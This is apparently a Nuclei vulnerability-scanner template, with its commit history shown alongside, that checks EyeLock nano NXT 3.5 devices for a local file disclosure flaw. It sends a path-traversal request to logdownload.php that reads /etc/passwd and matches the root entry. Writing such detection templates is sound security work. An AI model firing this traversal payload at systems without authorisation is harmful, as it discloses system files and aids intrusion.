nuclei-templates/vulnerabilities/other/eyelock-nano-lfd.yaml

id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Local File Disclosure
  author: geeknik
  severity: high
  description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
  reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
  tags: iot,lfi,eyelock

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
Create eyelock-nano-lfd.yaml 2021-08-16 10:42:45 +00:00			`id: eyelock-nano-lfd`

			`info:`
			`name: EyeLock nano NXT 3.5 - Local File Disclosure`
			`author: geeknik`
			`severity: high`
Update eyelock-nano-lfd.yaml 2021-08-16 11:10:42 +00:00			`description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.`
			`reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt`
			`tags: iot,lfi,eyelock`
Create eyelock-nano-lfd.yaml 2021-08-16 10:42:45 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`